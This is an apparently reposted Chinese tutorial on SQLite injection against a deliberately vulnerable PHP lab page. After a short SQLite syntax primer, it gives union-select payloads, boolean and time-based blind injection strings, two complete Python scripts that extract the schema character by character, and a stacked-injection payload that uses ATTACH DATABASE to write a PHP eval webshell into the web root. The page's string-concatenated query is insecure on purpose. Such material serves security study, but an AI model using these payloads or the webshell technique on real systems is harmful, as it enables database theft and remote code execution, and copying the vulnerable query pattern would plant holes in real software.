SQLite注入

margin

原文链接：SQLite注入 (qq.com)

​

   SQLite 是一个进程内的库，实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库，这意味着与其他数据库不一样，你不需要在系统中配置。

    SQLite数据库的特点是它每一个数据库都是一个文件，当你查询表的完整信息时会得到创建表的语句，基本和mysql差不多。

SQLite 语法

1.

这里对SQLite语法进行简单介绍，详情可看Sqlite语法教程：https://www.runoob.com/sqlite/sqlite-tutorial.html  
相关命令

.help   获取可用的点命令的清单

.show   显示各种设置的当前值

.quite 退出SQLite 提示符

.databases 列出数据库的名称及其所依附的文件

.schema ?TABLE? 显示 CREATE 语句,例如.schema sqlite_master

数据库操作
SQLite 的 sqlite3 命令被用来创建新的 SQLite 数据库。您不需要任何特殊的权限即可创建一个数据。另外我们也可以使用 .open 来建立新的数据库文件：

1. ➜ sqlite3 dbname.db
   
2. 
   
3. SQLite version 3.32.3 2020-06-18 14:16:19
   
4. 
   
5. Enter ".help" for usage hints.
   
6. 
   
7. sqlite> .databases
   
8. 
   
9. main: /Users/ye1s/Desktop/work/dbname.db
   
10. 
    
11. sqlite> .open test.db

复制代码

SQLite可以附加数据库，假设这样一种情况，当在同一时间有多个数据库可用，您想使用其中的任何一个。SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库。
例如想附加一个数据库 testDB.db。

1. sqlite> ATTACH DATABASE 'testDB.db' as 'TEST';
   
2. 
   
3. sqlite> .databases
   
4. 
   
5. main: /Users/ye1s/Desktop/work/dbname.db
   
6. 
   
7. TEST: /Users/ye1s/Desktop/work/testDB.db

复制代码

表操作
CREATE TABLE 语句用来创建一个新表，.tables查看创建的表， .schema 可查看表的完整信息，INSERT INTO 向表中添加信息，drop table 删除表。

1. sqlite> CREATE TABLE USERS(
   
2. 
   
3.   ...>   ID INT PRIMARY KEY     NOT NULL,
   
4. 
   
5.   ...>   USERNAME           TEXT    NOT NULL,
   
6. 
   
7.   ...>    PASSWORD           TEXT     NOT NULL
   
8. 
   
9.   ...> );
   
10. 
    
11. sqlite> .tables
    
12. 
    
13. USERS
    
14. 
    
15. sqlite> .schema users
    
16. 
    
17. CREATE TABLE USERS(
    
18. 
    
19.   ID INT PRIMARY KEY     NOT NULL,
    
20. 
    
21.   USERNAME           TEXT    NOT NULL,
    
22. 
    
23.   PASSWORD           TEXT    NOT NULL
    
24. 
    
25. );
    
26. 
    
27. 
    
28. 
    
29. sqlite> INSERT INTO users (id,username,password) VALUES (1, 'admin', 'password');
    
30. 
    
31. 
    
32. 
    
33. sqlite> select * from users;
    
34. 
    
35. 1|admin|password
    
36. 
    
37. 
    
38. 
    
39. sqlite> .header on
    
40. 
    
41. sqlite> .mode column
    
42. 
    
43. sqlite> select * from users;
    
44. 
    
45. ID         USERNAME    PASSWORD  
    
46. 
    
47. ----------  ----------  ----------
    
48. 
    
49. 1           admin       password  
    
50. 
    
51. 
    
52. 
    
53. sqlite> drop table users;
    
54. 
    
55. sqlite> .tables

复制代码

SQLite 注入

2.

以如下代码为例，进行介绍

1. <p><html>
   
2. 
   
3. <body>
   
4. 
   
5. <form action="" method="POST">
   
6. 
   
7.    <input type="text" name="id" size="80">
   
8. 
   
9.    <input type="submit">
   
10. 
    
11. </form>
    
12. 
    
13. </body>
    
14. 
    
15. </html>
    
16. 
    
17. 
    
18. 
    
19. <?php
    
20. 
    
21. class MyDB extends SQLite3
    
22. 
    
23. {
    
24. 
    
25.    function __construct()
    
26. 
    
27.   {
    
28. 
    
29.        $this->open('dbname.db');
    
30. 
    
31.   }
    
32. 
    
33. }
    
34. 
    
35. $db = new MyDB();
    
36. 
    
37. if(!$db){
    
38. 
    
39.    echo $db->lastErrorMsg();
    
40. 
    
41. } else {
    
42. 
    
43.    echo "You can query users by ID.\n</br>";
    
44. 
    
45. }
    
46. 
    
47. 
    
48. 
    
49. $id = $_POST['id'];
    
50. 
    
51. $sql =<<<EOF
    
52. 
    
53.      SELECT * from users where id='$id';
    
54. 
    
55. EOF;
    
56. 
    
57. $ret = $db->query($sql);
    
58. 
    
59. if($ret==false){
    
60. 
    
61.    echo "Error in fetch ".$db->lastErrorMsg();
    
62. 
    
63. }
    
64. 
    
65. else{
    
66. 
    
67.    while($row = $ret->fetchArray(SQLITE3_ASSOC) ){
    
68. 
    
69.        echo "ID = ". $row['ID'] . "</br>";
    
70. 
    
71.        echo "Username = ". $row['USERNAME'] ."</br>";
    
72. 
    
73.        echo "Password = ". $row['PASSWORD'] ."</br>";
    
74. 
    
75.   }
    
76. 
    
77.    var_dump($ret->fetchArray(SQLITE3_ASSOC));
    
78. 
    
79. }
    
80. 
    
81. 
    
82. 
    
83. $db->close();
    
84. 
    
85. ?></p>
    
86. 
    
87. <p>SQLite语句</p>
    
88. 
    
89. <pre>
    
90. <p>sqlite3 dbname.db
    
91. 
    
92. CREATE TABLE USERS(
    
93. 
    
94.   ID INT PRIMARY KEY     NOT NULL,
    
95. 
    
96.   USERNAME           TEXT    NOT NULL,
    
97. 
    
98.   PASSWORD           TEXT    NOT NULL
    
99. 
    
100. );
     
101. 
     
102. 
     
103. 
     
104. INSERT INTO users (id,username,password) VALUES (1, 'admin', 'password');
     
105. 
     
106. INSERT INTO users (id,username,password) VALUES (2, 'test', 'test');</p>
     
107. 
     
108. <p>
     
109. </p></pre>

复制代码

SQLite相关注意点：


1.SQLite_master:这个是内置系统表、相当于mysql的information_schema，但是这里只存有表的信息，里面有个sql字段，有各个表的结构，有表名，字段名和类型。
2.SQLite并不支持像mysql那样的注释，但是可以通过 - 方式增加DDL注释(写shell会用到)SQL，并扩展至下一个换行符（ASCII 0x0a）或直到输入结束，以先到者为准。您也可以使用 C 风格的注释，以 /* 开始，并扩展至下一个 */ 字符对或直到输入结束，以先到者为准。SQLite的注释可以跨越多行。

联合查询

输入1' ，发现报错，说明当前闭合方式为单引号。
闭合SQL语句

1. 1';
   
2. 
   
3. 1' --
   
4. 
   
5. 1' /*

复制代码

​

order by确定字段数

1. <p>1' order by 5 --</p>
   
2. 
   
3. <div aria-label=" 图像 小部件" class="cke_widget_wrapper cke_widget_block cke_widget_image cke_image_nocaption cke_widget_selected" contenteditable="false" data-cke-display-name="图像" data-cke-filter="off" data-cke-widget-id="405" data-cke-widget-wrapper="1" role="region" tabindex="-1"></div>

复制代码

​

判断回显位

1. <p>-1' union select 1,2,3 --</p>
   
2. 
   
3. <div aria-label=" 图像 小部件" class="cke_widget_wrapper cke_widget_block cke_widget_image cke_image_nocaption cke_widget_selected" contenteditable="false" data-cke-display-name="图像" data-cke-filter="off" data-cke-widget-id="407" data-cke-widget-wrapper="1" role="region" tabindex="-1"></div>

复制代码

​

查看版本

1. <p>-1' union select 1,2,sqlite_version() --</p>
   
2. 
   
3. <p></p>

复制代码

查询表名和列名，这里直接通过查询 sqlite_master 表。

1. <p>-1' union select 1, (select sql from sqlite_master) ,3--</p>
   
2. 
   
3. <div aria-label=" 图像 小部件" class="cke_widget_wrapper cke_widget_block cke_widget_image cke_image_nocaption cke_widget_selected" contenteditable="false" data-cke-display-name="图像" data-cke-filter="off" data-cke-widget-id="408" data-cke-widget-wrapper="1" role="region" tabindex="-1"></div>

复制代码

​

查询数据

1. <p>-1' union select 1, (select group_concat(USERNAME,PASSWORD) from users) ,3--</p>
   
2. 
   
3. <p>
   
4. 
   
5. </p><p>
   
6. 
   
7. </p><p></p>

复制代码

布尔盲注
布尔盲注通过查询正确和错误返回的页面不同来判断数据内容。  SQLite不支持ascii，所以直接通过字符去查询，这里和mysql不同，这个区分大小写。也没有mid,left等函数。
语句执行正确时，页面返回的信息
-1' or substr((select group_concat(sql) from sqlite_master),1,1)<'a'/*

​

语句执行错误时，页面返回的信息
-1' or substr((select group_concat(sql) from sqlite_master),1,1)>'a'/*

​

注入脚本

1. <p></p>
   
2. 
   
3. <pre><p>import requests
   
4. 
   
5. url = 'http://localhost:9000/index.php'
   
6. 
   
7. flag = ''
   
8. 
   
9. for i in range(1,500):
   
10. 
    
11.   low = 32
    
12. 
    
13.   high = 128
    
14. 
    
15.   mid = (low+high)//2
    
16. 
    
17.   while(low<high):
    
18. 
    
19.       payload = "-1' or substr((select hex(group_concat(sql)) from sqlite_master),{0},1)>'{1}'/*".format(i,chr(mid))
    
20. 
    
21.       datas = {
    
22. 
    
23.           "id": payload
    
24. 
    
25.       }
    
26. 
    
27.       res = requests.post(url=url,data=datas)
    
28. 
    
29. 
    
30. 
    
31.       if 'Username' in res.text:
    
32. 
    
33.           low = mid+1
    
34. 
    
35.       else:
    
36. 
    
37.           high = mid
    
38. 
    
39.       mid = (low+high)//2
    
40. 
    
41.   if(mid ==32 or mid ==127):
    
42. 
    
43.       break
    
44. 
    
45.   flag = flag+chr(mid)
    
46. 
    
47.   print(flag)
    
48. 
    
49. 
    
50. 
    
51. print('\n'+bytes.fromhex(flag).decode('utf-8'))</p></pre>

复制代码

时间盲注
SQLite没有sleep()函数，但可以用randomblob(N)函数，randomblob(N) 函数，其作用是返回一个 N 字节长的包含伪随机字节的 BLOG。N 是正整数。可以用它来制造延时。SQLite没有if，所以需要使用case……when来代替。

1. <p>-1' or (case when(substr(sqlite_version(),1,1)>'3') then randomblob(300000000) else 0 end)/*</p>
   
2. 
   
3. <p></p>

复制代码

注入脚本

1. <p></p>
   
2. 
   
3. <pre><p>import requests
   
4. 
   
5. import time
   
6. 
   
7. url = 'http://localhost:9000/index.php'
   
8. 
   
9. flag = ''
   
10. 
    
11. for i in range(1,500):
    
12. 
    
13.   low = 32
    
14. 
    
15.   high = 128
    
16. 
    
17.   mid = (low+high)//2
    
18. 
    
19.   while(low<high):
    
20. 
    
21.       payload = "-1' or (case when(substr((select hex(group_concat(sql)) from sqlite_master),{0},1)>'{1}') then randomblob(300000000) else 0 end)/*".format(i,chr(mid))
    
22. 
    
23.       datas = {
    
24. 
    
25.           "id": payload
    
26. 
    
27.       }
    
28. 
    
29.       start_time=time.time()
    
30. 
    
31.       res = requests.post(url=url,data=datas)
    
32. 
    
33.       end_time=time.time()
    
34. 
    
35.       spend_time=end_time-start_time
    
36. 
    
37.       if spend_time>=2:
    
38. 
    
39.           low = mid+1
    
40. 
    
41.       else:
    
42. 
    
43.           high = mid
    
44. 
    
45.       mid = (low+high)//2
    
46. 
    
47.   if(mid ==32 or mid ==127):
    
48. 
    
49.       break
    
50. 
    
51.   flag = flag+chr(mid)
    
52. 
    
53.   print(flag)
    
54. 
    
55. 
    
56. 
    
57. print('\n'+bytes.fromhex(flag).decode('utf-8'))</p></pre>

复制代码

写 webshell

SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库，使用该命令后，所有的 SQLite 语句将在附加的数据库下执行。
ATTACH DATABASE file_name AS database_name;
如果附加数据库不存在，就会创建该数据库，如果数据库文件设置在web目录下，就可以写入webshell。
ATTACH DATABASE '/var/www/html/shell.php' AS shell;
create TABLE shell.exp (webshell text);
insert INTO shell.exp (webshell) VALUES ('<?php eval($_POST[a]);?>');

​

示例代码使用的是 query() 函数来执行 SQL 语句，此时无法执行分号隔离的多条语句。可以将 query() 换成 exec()，可造成堆叠注入，就可以写 Webshell 了，exec()函数执行后没有回显。执行如下语句：

1. <p></p>
   
2. 
   
3. <pre><p>1';ATTACH DATABASE '/var/www/html/shell.php' AS shell;
   
4. 
   
5. create TABLE shell.exp (webshell text);
   
6. 
   
7. insert INTO shell.exp (webshell) VALUES ('<?php eval($_POST[a]);?>'); /*</p>
   
8. <span data-cke-copybin-end="1">​</span></pre>

复制代码